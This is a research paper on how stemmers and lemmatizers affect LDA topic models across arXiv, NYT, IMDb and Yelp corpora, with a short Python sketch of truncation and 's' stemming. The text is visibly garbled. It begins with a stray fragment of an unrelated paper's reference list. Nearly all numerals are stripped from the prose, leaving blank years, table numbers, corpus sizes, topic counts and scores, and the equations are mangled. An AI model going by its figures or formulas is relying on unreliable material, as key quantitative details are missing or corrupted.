(iccc). kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://oro.open.ac.uk/ / http://arxiv.org/abs/ . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. xenakis i. . formalized music. bloomington: indiana university press. yee-king mj, fedden l, d’inverno m. . 
automatic programming of vst sound synthesizers using deep networks and other techniques. ieee transactions on emerging topics in computational intelligence ( ): – .

comparing apples to apple: the effects of stemmers on topic models

alexandra schofield, cornell university, ithaca, ny, xanda@cs.cornell.edu
david mimno, cornell university, ithaca, ny, mimno@cs.cornell.edu

abstract

rule-based stemmers such as the porter stemmer are frequently used to preprocess english corpora for topic modeling. in this work, we train and evaluate topic models on a variety of corpora using several different stemming algorithms. we examine several different quantitative measures of the resulting models, including likelihood, coherence, model stability, and entropy. despite their frequent use in topic modeling, we find that stemmers produce no meaningful improvement in likelihood and coherence and in fact can degrade topic stability.

introduction

stemming is a popular way to reduce the size of a vocabulary in natural language tasks by conflating words with related meanings. specifically, stemming aims to convert words with the same "stem" or root (e.g. "creative" and "creator") to a single word type ("create"). though originally developed in the context of information retrieval (ir) systems, stemmers are now commonly used as a preprocessing step in unsupervised machine learning tasks. in this work we consider one such application, topic modeling. although stemmers are commonly used in topic models (liu et al., ; lo et al., ; nan et al., ; kamath s et al., ; su, ; jacobi et al., ), we find no empirical benefits for the practice.

one could conjecture several reasons to stem for semantic models. first, conflating semantically related words into one word type could improve model fit by intelligently reducing the space of possible models. given that reducing the feature space randomly is already known to be potentially beneficial (ganchev and dredze, ), doing so in a semantically-inspired way might be even better. second, stemmers could reduce the effect of small morphological differences on the stability of a learned model. reducing the words "happy", "happily", and "happier" to one token may result in fewer possible models with divergent "happy" topics. third, stemmers approximate intuitive word equivalence classes, so language models based on stemmed corpora inherit that semantic similarity, which may improve interpretability as perceived by human evaluators.

however, stemmers have the potential to be confusing, unreliable, and possibly even harmful in language models. first, many stemmers produce terms that are not recognizable english words and may be difficult to map back to a valid original word, such as "stai" as the porter stem of "stay". second, although stemming aids document retrieval for many languages, english is a notorious exception (harman, ). in english, the complexity of compound affixes with meaning can lead to over-stemming, such as "recondition," a word sharing a stem but not a root meaning with "recondite." these complexities can also lead to the incorrect conflation of words with the same root but divergent meaning, such as "absolutely" and "absolution". third, and most troubling, there are cases in which morphological variants of the same stem carry significantly different meanings.
conflating "apple" and "apples" is uncontroversial, but loses the distinction between a device manufacturer and a type of fruit.

topic modeling is sensitive to preprocessing because of its dependence on a sparse vocabulary (jockers and mimno, ). in practice, however, preprocessing methods are typically neither detailed nor justified, leading to problems in reproducibility (fokkens et al., ). we believe investigating the effects of stemming will inform researchers outside the core natural language processing community as to how best to preprocess their texts. while stemmers are used in topic modeling, we know of no analysis focused on their effect. we draw inspiration from prior studies of the effects of stemming for other tasks and models (harman, ; han et al., ; jivani, ; rani et al., ) to apply rule-based stemmers to a variety of corpora to test their effect on topic models. we evaluate the quantitative fit of the models generated and the qualitative differences between differently-stemmed corpora to investigate the effects each stemmer has on a corpus. we hope that these results help guide future researchers as to how to select and evaluate stemmers for a given task and corpus.

background

in this work we consider two categories of word normalization methods: rule-based stemmers, or stemmers primarily reliant on rules converting one affix to another, and context-based methods, or strategies that use dictionaries and other contextual, inflectional, and derivational information to infer the correct word root (jivani, ). we omit several language-independent strategies of text normalization, including those using markov chains (melucci and orio, ) and clustering (majumder et al., ). these methods are corpus-specific and error-prone, and we have not observed their use in topic modeling.

in our evaluation, we consider nine different methods of word normalization, given below with two-letter labels. in addition to including popular rule-based stemmers, we choose several simple stemmers that are stronger and weaker than the named stemmers, where strength refers to how much the vocabulary is reduced. we will sometimes use the more general term conflation treatment, or simply treatment, to refer to these methods with respect to our corpus. (other methods of word normalization include case folding and replacing classes of tokens with a constant, e.g. number for numerals.) these treatments are compared to the control, no-stemmer treatment, ns.

rule-based treatments

the first category, rule-based stemmers, includes methods primarily governed by a set of rules that convert one affix to another. most classic stemmers fit into this category, including the famous porter stemmer. these methods are quick, but also limited: no concise rule set captures every english morphological exception, and these stemmers cannot use context to resolve ambiguous word types. they are also deterministic and consistent for each token: if word type a maps to stem b in one location, it will do so in every location where word type a arises. treatments of this type are therefore effectively equivalence relations over untreated words, with a conflation class being an equivalence class of word types under a conflation treatment t.
while jivani ( ) refers to these as "truncation stemmers" or "affix removal stemmers," we find this naming confusing: stemmers rarely strictly truncate, and almost all stemmers aim to remove affixes. the core similarity of these methods is that all of the language-specific information used in these stemmers is encoded directly into the rules they apply.

truncation stemmers. k-truncation stemmers (bhamidipati and pal, ) remove all but the first k characters of a word. as a naïve, high-strength method, they serve as a good baseline for the relative effects of simple vocabulary reduction. we test four-truncation (t4) and five-truncation (t5). five-truncation has strength close to a strong rule-based stemmer; levels below four are incoherent.

"s" stemmer. the s-removal stemmer or "s" stemmer (ss) removes s-based endings using only three rules. harman ( ) introduces the "s" stemming algorithm as a weaker and simpler counterpoint to more standard rule-based stemmers. as the rules are simple and good representatives of the types of rules employed by the other stemmers in this section, we include them in table :

table : the "s" stemmer of harman ( ) consists of three rules, applied in order; only the first rule whose ending in the first column matches is applied.
  if the word ends with -ies (but not -aies or -eies), replace the ending with -y
  if the word ends with -es (but not -aes, -ees, or -oes), replace the ending with -e
  if the word ends with -s (but not -ss or -us), remove the -s

lovins stemmer. the lovins stemmer (ls) is a rule-based stemmer using a two-step stemming algorithm (lovins, ). these steps use long lists of rules, but the method is still fast and simple to implement, and it is generally considered a strong stemmer.

porter and porter2 stemmers. the porter stemmer (porter, ), one of the most popular in current use, is a slightly less strong and more intricate stemmer than lovins'. it uses five phases of rules and conditions that match patterns of vowel and consonant sequences. porter later created a slightly improved version of the porter stemmer for snowball, a programming language for rule-based stemmers (porter, ). we use both the original stemmer (p1) and the new version (p2) in our evaluation.

paice/husk stemmer. the paice/husk stemmer (ph), or lancaster stemmer, iterates indefinitely over the same rule list, with some rules applying only to unmodified words and others terminating iteration (paice, ). while slightly more complicated in rule structure, the paice/husk stemmer is similar to the lovins stemmer in strength.
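to make the flavour of these rule-based treatments concrete, here is a small python sketch of the two simplest ones, k-truncation and the "s" stemmer from table ; this is an illustration of the rules as described, not the exact implementation used in the experiments.

```python
RULES = [
    ("ies", ("aies", "eies"), "y"),
    ("es", ("aes", "ees", "oes"), "e"),
    ("s", ("ss", "us"), ""),
]

def k_truncation_stem(word, k=5):
    """k-truncation: keep only the first k characters (t4/t5 in the text)."""
    return word[:k]

def s_stem(word):
    """harman's "s" stemmer: apply the first rule whose ending matches,
    unless one of its exceptions also matches."""
    for ending, exceptions, replacement in RULES:
        if word.endswith(ending):
            if not word.endswith(exceptions):
                return word[: -len(ending)] + replacement
            return word
    return word
```

for example, s_stem("apples") returns "apple", while s_stem("bus") is left unchanged because of the -us exception.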
the dictionary itself is crucial for implementation; for our krovetz stemmer treatment (ks), we use the lemur project implementation. lemmatizer. lemmatizers use a database of lem- mas, or standardized word forms, in order to find the best normalized word form for a given token. while the method is orders of magnitude slower than rule-based stemmers, it is also much more princi- pled and extremely unlikely to over-conflate. we use the wordnet-based lemmatizer (wl) implemented in the natural language toolkit (bird et al., ) along with a stanford pos tagger (toutanova et al., ) on the unmodified text to provide auxiliary part-of-speech information for the lemmatizer. model and data in this paper, we focus on modeling topics in english datasets using latent dirichlet allocation (lda), a generative model for documents based upon their topics (blei et al., ). a topic φ in this context is a multinomial probability distribution over words, without any embedded semantic model of how the words are connected. in lda, each document has a multinomial distribution θ over topics; a document d is generated by choosing a number of words, and for each word first sampling a topic k from θd, then a word w from the distribution over words φk asso- ciated with topic k. the name latent dirichlet allocation comes from the assumptions that information about each word’s topic or the original distributions θ and φ is latent (i.e. unobserved) and that the topic and word dis- tributions θ and φ are drawn from dirichlet distri- butions: θ ∼ dir(α), and φ ∼ dir(β). using this model, one can attempt to infer the most likely topics to generate a corpus for some preset number of topics k. however, the optimization problem is non-convex and intractable to solve analytically, and is thus generally solved using iterative techniques such as gibbs sampling, expectation maximization, or variational inference. the resulting topics fre- quently display themes within the common words in a topic that can be used for classification, search, and recommendation systems. because stemming affects the vocabulary distri- bution of a corpus, the optimal parameters of topic model inference will vary depending on treatment. we us adaptive optimization of both dirichlet hy- perparameters α and β. we use an asymmetric α and symmetric β to obtain the best model fit in ac- cordance with wallach et al. ( ). in order to test the various word normalization treatments, we used an existing python library for the lovins, paice/husk, and both porter algorithms (chaput, ), modified to correct errors in im- plementation. we implemented our own trunca- tion stemmers and s-removal stemmer. we applied each stemmer to each word token in four corpora: articles from arxiv in early , articles from the new york times in (sandhaus, ), bi- ographies from imdb, and reviews from the yelp dataset challenge. corpora were partitioned into % training documents, % test documents and lower-cased before conflation, which was performed per-sentence on lower-cased text. after treatment, we remove stopwords, digits, and punctuation. ta- ble shows details of the corpora, and table shows examples of each treatment. we train topic models using mallet (mccallum, ) for k = , , and , with at least nine models for each corpus, treatment, and k combination. training data evaluation data corpus # docs # toks # docs # toks arxiv articles . k . m . k . m imdb bios . k . m . k . m nyt articles . k . m . k . m yelp reviews k . m k . 
m table : training and test corpora represent considerable variance in content, size of corpus, average length of doc- ument, and proportion of training to test data. evaluations in order to evaluate the differences between confla- tion treatments of these corpora, we want to look at a variety of different types of evaluation of topic models. unfortunately, as described later, standard retrieved from arxiv (http://www.arxiv.org). courtesy of imdb (http://www.imdb.com). retrieved from yelp (http://www.yelp.com/ dataset_challenge). our code can be found at https://github.com/ heraldicsandfox/stemmers. evaluations of topic quality such as held-out likeli- hood and coherence are implicitly affected by the size of the vocabulary. to be able to compare dif- ferent treatments without simply favoring the maxi- mum possible vocabulary reduction, we create mod- ified versions of several existing classic evaluations as well as new metrics for understanding differences in models at the level of word types instead of topics. . held-out likelihood strong stemmers can improve the joint probability of documents occurring without improving the qual- ity of the model. as we reduce the size of the vo- cabulary, each topic-word distribution is spread over fewer possible words; at its extreme, the probabil- ity of any corpus under a zero-truncation stemmer would be . . experiments confirmed that for these treatments, the standard held-out likelihood score l of the test corpus based on the trained model ordered stemmers by how much they reduce the vocabulary, assigning the highest likelihood to those treatments with the smallest vocabularies. to account for the likelihood improvement caused by reducing vocabulary size, we normalize a model with k topics by the likelihood of a smoothed un- igram language model with the same β parameter. we calculate from the normalized log likelihood lnorm a per-token metric ptllnorm to put corpora of different lengths on a comparable scale. we com- pute the unigram model probability as a smoothed multinomial with prior β, number of instances of word type w in a corpus nw, vocabulary size w and total token count n: lunigram = ∏ j ∏ i nwij + β n + wβ ( ) lnorm = l/lunigram ( ) ptllnorm = log(lnorm) n = logl n − log(lunigram) n . ( ) our resulting metric measures how much on aver- age the introduction of multiple topics improves the probability of each token occurring. . topic coherence though log likelihood describes the statistical like- lihood of the topic model generating the corpus, it http://www.arxiv.org http://www.imdb.com http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge https://github.com/heraldicsandfox/stemmers https://github.com/heraldicsandfox/stemmers original this location does not have good service. went through drive-through and they forgot our drinks and our sides. while they were preparing what they forgot, we could see another girl who had her back to us and it was obvious that she was on her phone. any other kfc would be better. tokenized this location does not have good service went through drive through and they forgot our drinks and our sides while they were preparing what they forgot we could see another girl who had her back to us and it was obvious that she was on her phone any other kfc would be better stopped location good service drive forgot drinks sides preparing forgot girl back obvious phone kfc ns location good service drive forgot drinks sides preparing forgot girl back obvious ... 
t loca good serv driv forg drin side prep forg girl back obvi ... t locat good servi drive forgo drink sides prepa forgo girl back obvio ... lo loc good servic dr forgot drink sid prepar forgot girl back obv ... p locat good servic drive forgot drink side prepar forgot girl back obviou ... p locat good servic drive forgot drink side prepar forgot girl back obvious ... ph loc good serv driv forgot drink sid prep forgot girl back obvy ... ss location good service drive forgot drink side preparing forgot girl back obvious ... kr location good service drive forgot drink side prepare forgot girl back obvious ... wl location good service drive forget drink side prepare forget girl back obvious ... table : a demonstration of the steps of preprocessing on a yelp review. does not necessarily indicate topics that are seman- tically coherent to a human observer. to measure this, we use the topic coherence measure proposed by mimno et al. ( ). this metric is defined for a given topic k and a list of the top m words of a topic vk , . . .v k m as c(k) = m∑ m= m− ∑ l= log d(vl,vm) + β d(vl) + β ( ) where d(vl) is the number of documents in which word vl occurs and d(vl,vm) is the number of doc- uments in which both words vl and vm occur. this metric is similar to pointwise mutual information lau et al. ( ), but instead of using a sliding win- dow over the text to determine co-occurrence, it uses full documents as discrete windows. to avoid biasing towards the smaller vocabular- ies of stemmed datasets, we use the token-topic as- signments output by the topic model with the list of untreated tokens to produce untreated top keywords for each topic. we then use the original untreated corpus and these new keywords to compute coher- ence values. this allows us to observe whether con- flation treatments map tokens to the same topic in a more coherent way than untreated corpora would. we experimented with using wikipedia as a refer- ence corpus, but found it too general a reference for a semantic model in a narrow context such as a sci- entific paper or an actor biography. . clustering consistency if we treat topic models as clusterings of tokens, we can evaluate how consistent those clusters are. variation of information (voi), a symmetric mea- surement of difference between clusterings, allows us to evaluate how much of a difference stemming makes in the topics formed (meilă, ; grimmer and king, ). although some degree of vari- ation is inevitable between different trials with the same treatment due to randomness in the inference algorithm, stemming may affect how much occurs. we use two voi-based metrics to examine treatment stability and differences: intra-treatment voi and inter-treatment voi. intra-treatment voi is voi be- tween models trained with different random initial- izations but the same treatment. correspondingly, inter-treatment voi is the voi between outputted topic assignments from different treatments. if the inter-treatment voi is equal to the voi between tri- als of the same treatment, we infer that the change in treatment has made a negligible difference in the assignment of tokens to topics. . influential words the metrics above are all summary statistics that measure different types of overall topic model qual- ity. however, to understand why these metrics are affected the way they are, we also need some way to examine the individual components we have af- fected: the word types available in our documents. 
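before turning to the word-level diagnostics, a minimal sketch of the document co-occurrence coherence defined in the topic coherence subsection may be useful. it assumes the top keywords have already been mapped back to untreated tokens via the token-topic assignments, as described above; the function name, the data layout (documents as token lists) and the smoothing default are illustrative assumptions, not the released evaluation code.

```python
import numpy as np

def topic_coherence(top_words, documents, beta=0.01):
    """document co-occurrence coherence of one topic (mimno et al.-style).

    top_words: the topic's top m keywords, ordered by probability and already
               mapped back to untreated tokens.
    documents: iterable of token lists from the untreated corpus.
    beta:      smoothing term added to both counts (placeholder value).
    """
    doc_sets = [set(doc) for doc in documents]
    # d(v): number of documents containing word v
    d = {v: sum(v in s for s in doc_sets) for v in top_words}

    def d2(vl, vm):
        # d(vl, vm): number of documents containing both words
        return sum((vl in s) and (vm in s) for s in doc_sets)

    score = 0.0
    for m in range(1, len(top_words)):      # m = 2 .. M (0-indexed)
        for l in range(m):                  # l = 1 .. m - 1
            vl, vm = top_words[l], top_words[m]
            score += np.log((d2(vl, vm) + beta) / (d[vl] + beta))
    return score
```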
we use two heuristics to identify words that are most affected by a given treatment. the first uses inferred token probabilities in the test corpus. we want a scoring function of untreated word types that is positive if the estimated joint probability of to- kens of a particular pre-treatment type increases af- ter treatment, and negative if it decreases. we also want the magnitude of the score to correspond with both the difference in probability across all tokens and the relative informativeness of that token in dis- tinguishing documents or topics. for a given word type w from the untreated corpus and function t applying some conflation treatment, we compute the word type probability, tpwt, as d∑ d= nd∑ i= i[xdi = w] log(p(t(xdi) = t(w)| . . . )), ( ) where d is the number of documents, nd is the number of tokens in document d, xdi is the untreated word type of token i in document d and t(xdi) is the treated type, i[xdi = w] is the indicator func- tion that is if xdi = w and zero otherwise, and p(t(xdi) = t(w)| . . . ) is shorthand for the held- out likelihood estimate of treated token t(xdi) hav- ing the type w generated using the left-to-right tech- nique given the inferred parameters θ,φ and hyper- parameters α,β of the trained model. we average the quantity in equation across all topic models of the same corpus, topic count, and treatment to get tpwt. in order to compute a rela- tive score of the amount of probability improvement of an individual treatment for a word type from the no-stemmer treatment t , we take the difference be- tween topic probabilities, weighted by inverse docu- ment frequency (idf) to favor words that are specific to particular documents. our final score function is tpscorewt = (tpwt −tpwt ) log ( d dw ) , ( ) where dw is the number of documents of the total d containing at least one token of type w. the lowest negative scores indicate higher probability and im- portance of the unstemmed form of the token, while high positive scores indicate higher probability and importance of the stemmed form. while this does not produce a symmetric distribution, as we have not accounted for the increased probability of each word in a smaller vocabulary, it allows us to sort words by how much their probability of occurring has changed between treatments and how much that word affects the corpus as a whole. the second heuristic tests whether stemming in- creases or decreases certainty of the topic assign- ment for each stemmed word type. intuitively, cor- rect conflation should reduce the information en- tropy across tokens of a given conflation class by forcing words with the same root to be treated as a single word in inference. topic models are in- tuitively better when words are sparsely distributed across topics; consequently, we prefer lower entropy across topics, or mass concentrated in only a few topics. a negative value for a word type under this entropy metric favors the stemmed corpus, while a positive score favors the untreated corpus. in this case, for a given word type w, we use the topic assignments from the final iteration of gibbs sampling to compute the number of instances of w assigned to each topic k. to preserve the sparsity inferred by the algorithm, we use this to generate a maximum-likelihood estimate of the probability dis- tribution of w being assigned to each topic, from which we can compute the shannon entropy: hwt(k) = − k∑ k= nwk nw log ( nwk nw ) , ( ) where nwk is the count of all tokens of type w as- signed to topic k. 
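the entropy heuristic above reduces to a shannon entropy over the maximum-likelihood topic distribution of a word type's tokens. a minimal sketch follows; the array layout (a per-word-type vector of topic counts taken from the final gibbs sampling iteration) and the use of the natural logarithm are assumptions for illustration, not a description of the mallet output format.

```python
import numpy as np

def word_topic_entropy(topic_counts):
    """shannon entropy of a word type's topic assignments.

    topic_counts: length-k vector; topic_counts[k] is the number of tokens of
    this word type assigned to topic k in the final sampling iteration.
    """
    counts = np.asarray(topic_counts, dtype=float)
    total = counts.sum()
    if total == 0:
        return 0.0
    p = counts[counts > 0] / total          # maximum-likelihood estimate, kept sparse
    return float(-(p * np.log(p)).sum())    # lower entropy = mass in fewer topics
```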
for each treated form of a word w by a treatment t, we also consider the inverse im- age t− (w), or the set of all words that stem to have form w. we therefore compute a change in entropy using average h̄wt across all trials with treatment t and control t for a given corpus and topic count, ∆hwt(k) = h̄wt(k) − h̄t− (w)t (k), ( ) where h̄t− (w)t is the information entropy for the topic-word counts summed across all untreated types that conflate to type w under treatment t. results to evaluate the effects of conflation on topic mod- els, we produced several thousand inferred models. we apply the metrics described in section , com- puting means and standard errors across trials with the same topic count, corpus, and treatment where possible to ensure significance. . treatment strength many factors contribute to the general concept of “strength” of a stemmer, but the most obvious sig- nal is the amount by which a stemmer reduces the vocabulary of a corpus. after stopword removal, we count the total number of unique word types in our stemmed corpus for each treatment and training cor- pus, as well as the average number of characters in each word after treatment. comparing type-token ratios of rule-based stemmers to the untreated cor- pus gives a measurement of the ratio of untreated words to conflation classes under that treatment. we display these counts in figure . the results of these stemming treatments already demonstrate that stemmer strength can depend heav- ily on the type of corpus on which it is applied. for instance, the krovetz stemmer actually increases the size of the vocabulary of arxiv, whereas it produces more vocabulary reduction than the lemmatizer on both imdb and yelp. the proportions of rule-based stemmer type-token ratios are consistent across cor- pora, with the exception of truncation on arxiv. the frequent use of scientific prefixes (such as “inter” and “anti”) and bad conversion from pdf format in arxiv lead truncation stemmers to conflate at a higher rate than they do on other corpora with re- spect to other rule-based stemmers. the three dif- ferent light stemming methods — the s-stemmer, the krovetz stemmer, and the wordnet lemmatizer — perform similarly on the imdb corpus, but vary substantially across the other three corpora. character-token ratios vary less between corpora than type-token ratios. five-truncation produces words with an average length near the paice-husk and lovins stemmers. not surprisingly, s-stemming produces an average word length slightly less than the untreated corpus, while the krovetz stemmer and wordnet lemmatizer vary in strength across cor- pora. we also verify some expected results for these stemmers: truncation stemmers are very strong, with four-truncation reducing vocabulary size to one- fourth or one-fifth of the original. the porter stem- mers behave similarly to each other, with slightly more liberal stemming by the porter stemmer on figure : type-token ratio and character-token ratio vary substantially across training corpora and conflation treat- ments. due to the context-sensitive stemming done by the krovetz stemmer, it is possible for one untreated word type to map to multiple stemmed types, producing a greater type-to-token ratio for the arxiv version of the krovetz stemmer than for the original untreated corpus. all corpora but arxiv. the paice-husk and lovins stemmers are both stronger than porter, while the s- stemmer is consistently weaker. 
while the vocabu- lary of a corpus affects the strength of each stemmer, it does little to affect the strengths of the rule-based stemmers relative to each other. . held-out likelihood using our normalized log likelihood measure from equation , we can compare likelihoods across all our different treatments, as shown in figure . we observe for all standard rule-based stemmers treat- ments provide little likelihood benefit apart from reducing the vocabulary size; the porter stemming figure : while light conflation treatments may help particular corpora, word conflation generally decreases the statistical fit of a topic model proportionally to its strength as measured in normalized log likelihood. con- fidence intervals are the p = . range of belonging to the distribution of that treatment’s normalized log likeli- hoods across at least samples each. higher values of normalized log likelihood represent better model fit. treatments result in normalized log likelihoods sig- nificantly lower than the unstemmed treatment. sta- tistically, the porter stemmers do not appear to be improving the quality of the model; they are merely reducing the possible unigrams it could generate in a moderately principled way. both paice/husk and lovins have the same problem, but as they are stronger stemmers, problems of overconflation seem to reduce the quality further. more surprising, however, is the mediocre per- formance of the wordnet lemmatizer. the fact that yelp and imdb do not see an improvement with use of the lemmatizer is easy to explain away: these corpora contain slang, misspellings, and plenty of proper names, enough to make lemmatization a challenge. however, we see the same result in the case of new york times articles, an ideal corpus for topic modeling. while there are still many named entities, they arise in carefully-edited text with stan- dardized journalistic vocabulary. other observations are less surprising. five- truncation produces likelihoods comparable to the stronger lovins and paice/husk stemmers, and sig- nificantly better than either for the -topic yelp model. this may relate to the irregularities of re- view text: words elongated for emphasis (e.g. “hel- loooo”) and other oddities of online informal en- glish are hard for rule-based suffix stemmers to han- dle but still benefit from naı̈ve forms of conflation. the porter and porter stemmers are not signifi- cantly different in any case, which serves as com- forting validation that those not using the new gen- eration of the porter stemmer are not losing much. . topic coherence log likelihood measures can tell us about statisti- cal fit, but do not necessarily tell us about the actual apparent coherence of the model in terms of concep- tual similarity of words in a topic. in figure , we display the negative average coherence scores from equation for each treatment. the hypothesis we test is that using a conflation treatment should map morphologically different words with a shared con- cept to the same word, automatically constraining the topic model to ensure closely-related words are proportionally present in the same topics. our results do not conform to this intuition. the majority of treatments are statistically indistin- guishable from the untreated control with respect to coherence. 
the relative effects of these treat- ments on coherence are magnified as the number of topics increases; while no arxiv treatment dif- fers significantly in coherence at topics, at , the four strongest treatments (lovins, paice-husk, five-truncation and four-truncation) are significantly worse. four-truncation suffers a similar effect on imdb at and topics. in contrast, four- truncation actually improves in coherence compared to other treatments on yelp as the number of topics increases, reaching a significant level at topics. figure : conflation treatments introduce no significant difference in almost all cases in the resulting average neg- ative topic coherence of each model according to token assignments. smaller values indicating better coherence, and error bars represent the p = . range of possible mean values. given the lack of substantial statistical difference across a variety of treatments, it seems safe to con- clude that the use of stemmers is not substantially improving the encoding of word similarities in these topics. the topic model itself on the untreated cor- pus is perhaps already doing as good a job ensuring that words in the same conflation class have statisti- cally similar topic distributions. unstemmed topics sometimes contain words from the same conflation class (e.g. “restaurant” versus “restaurants”). while these might give a slight ad- vantage in coherence measures, this case implies that the stemmers are not necessary for bringing to- gether morphological variants in topics. . clustering consistency another hypothesized effect of stemming is that it will produce more consistent results by reducing the sensitivity of related words to random initialization. we can use variation of information (voi) to un- derstand how these models differ from each other relative to how much they vary between random ini- tializations. we summarize the results in figure . within statistical error bounds, intra-treatment voi is always less than or equal to the variation across treatments, and voi increases as the number of topics increases. on arxiv, the light treatments — the krovetz stemmer, s-stemmer, and wordnet lemmatizer — behave indistinguishably from the untreated corpus. the intra-treatment voi trend shows that stronger treatments generally result in less consistent models. this contradicts the intuition that stemming will help place words with similar meaning into the same topic. while stemming con- strains all conflated word types to share one prob- ability in each topic, it does not ensure that those probability distributions will favor few topics. there are two striking exceptions to this trend. the first is the krovetz stemmer. the intra-treatment voi of krovetz topic models stays closer to that of the untreated corpus than the s-stemmer or the wordnet lemmatizer. however, the higher inter- treatment voi between krovetz and the unstemmed corpus suggests that the krovetz stemmer produces small but significant changes in the optima of the topic model. for imdb, nyt, and yelp at top- ics, and nyt again at topics, the voi between the untreated corpus and krovetz-stemmed corpus is significantly greater than the voi of the untreated corpus with itself. in contrast, the variation of infor- mation between untreated and s-stemmed corpora is only negligibly higher than the intra-treatment voi of the s-stemmer. this is interesting given the repu- tation of krovetz as a weak stemmer. the second exception is the five-truncation stem- mer. 
though a very strong stemmer, its voi is in- distinguishable from the heavier lovins and paice- husk stemmers on most corpora, but when applied to yelp with topics, it actually does significantly better than either, in both intra-treatment and inter- treatment voi with the unstemmed corpus. this ef- fect can be seen to a less significant extent in mod- figure : the variation of information between different treatments of corpora indicates that while light stemming may improve the comparative similarity of topic models, heavier stemmers produce less stable topic assignments. the minimum for statistical significance is computed as the maximum p = . value for any topic model as compared with itself (i.e. the % confidence interval on the diagonal). els with fewer topics over yelp. this does not im- ply that five-truncation is a competitive stemmer, but rather illustrates that by this measure strong stem- mers perform worse than a naive baseline on a cor- pus with short words and irregular text. . influential words to identify word types that positively or negatively affect the quality of the model after stemming, we use our idf-probability and entropy metrics for each word type. the idf-probability metric strongly indi- cates that while conflation improves probability of words on average, the improvement applied primar- ily to conflated words. untreated words that do not share a conflation class under a treatment (e.g. “mar- quess”) often become less probable on average after stemming. their inferred hyperparameters are larger and thus encourage less sparsity in stemmed topic models; as a result, the probability of rarer words in their own conflation classes decreases as that prob- ability is more distributed across topics. this also increases the entropy of stemmed words from a size- one conflation class. we can confirm several hypotheses from earlier in the paper using these methods. for entropy dif- ferences, those conflation classes with the greatest weighted probability improvement for the truncation stemmers in arxiv include huge conflation classes of words with the same prefix but wildly different roots. in effect, these have forced sparsity where it should not necessarily have been, degrading coher- ence. as exemplified in the -topic nyt models, the porter stemmer improves the likelihood of com- mon words, like “street” (tpscore = ) and “mr” (tpscore = ), an outcome aligned with the rule-based stemmer’s aim to cope well with com- mon words. but for rarer words like “purgative” (tpscore = − . ) and “pranks” (tpscore = − . ), no such improvement is seen. these com- mon words do not have extreme entropy values, which supports our hypothesis that while the likeli- hood of common words improves with porter stem- ming, those words were already in the same topic and did not affect model coherence. while we cannot use the same entropy measurement on the context-sensitive lemmatizer, we see the same ef- fect, where the most-improved words are the most common, and the less-likely words in the stemmed model are rare words and names. interesting results also arise from the five- truncation stemmer. unlike prescriptive rule-based stemmers, the truncation stemmer does not produce more errors when typos arise; in fact, it can ac- commodate typos at the ends of words in a way that other stemmers cannot. 
while, once again, we observe that the word probabilities of truncated words are much improved for common words and slightly reduced for rare words, we discover that the best entropy improvements from untreated to stemmed words are elongated words and exclama- tions such as “eeeee” (∆hw(k) = − . ) and “haaaa” (∆hw(k) = − . ). at the opposite score extreme, several classes of words with many mis- spellings have increased entropy after stemming, but this is potentially misleading; topic models are very good at distinguishing dialects, and system- atic misspellings are likely to create differently- spelled but semantically similar topics in a many- topic model. over one hundred words conflate to “defin” with five-truncation, including upwards of sixty misspellings of “definitely,” which removes distinction between good and bad spellers that might be correlated with other features. related work we are not aware of other work evaluating a vari- ety of stemmers and conflation techniques on topic models. some prior work exists that evaluates the effect of stemming. several conflation methods were tested on a variety of document clustering algo- rithms by han et al. ( ), finding that they could reduce the number of features effectively but that the correct choice of stemmer varied. more recently, stankov et al. ( ) developed a stemmer to im- prove document clustering. both of these techniques demonstrate an improvement in clustering results and a reduction in features required, with the for- mer also introducing the notion of tradeoff between the precision of lemmatization and the efficiency and strength of stemmers. additionally, a variety of work exists in the gen- eral field of stemmer evaluation, though much of it centers on the information retrieval community. in particular, the work of harman ( ) highlights some of the fundamental issues of strong stemming, including the potential positive effect of light stem- mers like the s-removal stemmer. the notion of stemmer strength is detailed further by frakes and fox ( ), as well as several more precise met- rics of evaluation of stemmer strength. survey pa- pers from jivani ( ) and rani et al. ( ) detail the different existing stemming and conflation tech- niques for machine learning applications, including several statistical stemming algorithms that do not rely on a fixed set of rules. findings suggest that, while these statistical methods have potential, many are inefficient, complex, and difficult to calibrate well enough to produce good results. though we look forward to seeing the future development of these stemmers, for this work we chose to focus on simpler and more widely used methods. conclusion despite its abiding popularity, stemming does not improve coherence after controlling for the size of vocabulary, and may actually reduce predictive like- lihood and increase sensitivity to random initializa- tions. in most cases, the topic model was already grouping together common words with the same root on its own, and gained little by better model- ing rare words. light treatments seem to fare better than strong stemmers, with krovetz doing particu- larly well for well-proofread corpora, but the small differences between words that these target such as pluralization and verb conjugation are often already captured by semantic models like lda. in certain cases, a stemmer may encode an as- sumption that is useful for coping with a corpus with heavy variation, as with the -truncation stemmer helping to correct misspellings on yelp. 
while this does not improve the quality of the topic model by most measures, it may be suited for a particular task involving abnormally varied word forms to which the model is applied. however, for stemmers encod- ing standard rules of spelling and grammar, such a benefit is unlikely. given the overly-strong effects of truncation stemming, we suggest using a stem- mer as a method of discovering misspellings to fix instead of as a way of repairing them. a common motivation for stemming is to display more succinct results by not repeating minor mor- phological variations (such as “place” and “places” unstemmed room hotel stay rooms pool nice stayed strip night bed check clean bathroom desk casino vegas free front resort shower stemmed after training room hotel stai pool nice strip night bed check clean bathroom desk casino vega free front resort shower stemmed before training room hotel stai pool nice bed check strip night vega suit casino clean bath- room view desk resort dai walk area table : an example topic from an unstemmed yelp -topic model with redundant keywords demonstrates that stemming after modeling produces the same appar- ent high-probability words as stemming before. in the case of yelp). as an alternative we suggest post-stemming the list of keywords, as shown in ta- ble . stemming a list of top words after modeling allows topic models to exploit the nuances of mor- phologies, such as “apple” and “apples” with respect to the company and the fruit, while still allowing the eventual viewer to browse through the resulting concepts quickly. post-stemming is computationally much cheaper than stemming the full corpus, requir- ing only a slightly longer input list of most probable terms. because context is unavailable for keywords and strong stemmers reduce readability, we would suggest using the s stemmer or a modification of the porter stemmer to return to english word forms. vocabulary curation can have a profound effect on the results of statistical models, yet procedures for vocabulary curation have largely been left to unex- amined convention and undocumented folk wisdom. we find that a commonly used method, stemming, provides little measurable benefit and may in fact be harmful. as text mining becomes more influential outside core nlp research, more attention must be paid to these issues. acknowledgements we would like to thank jacob gardner, jack hessel, andrew loeb, brian mcinnis, and elly schofield for helping to refine the writing in this paper. we also would like to thank the tacl editors mark john- son and hal daumé iii and the reviewers for their thoughtful comments and suggestions. the first 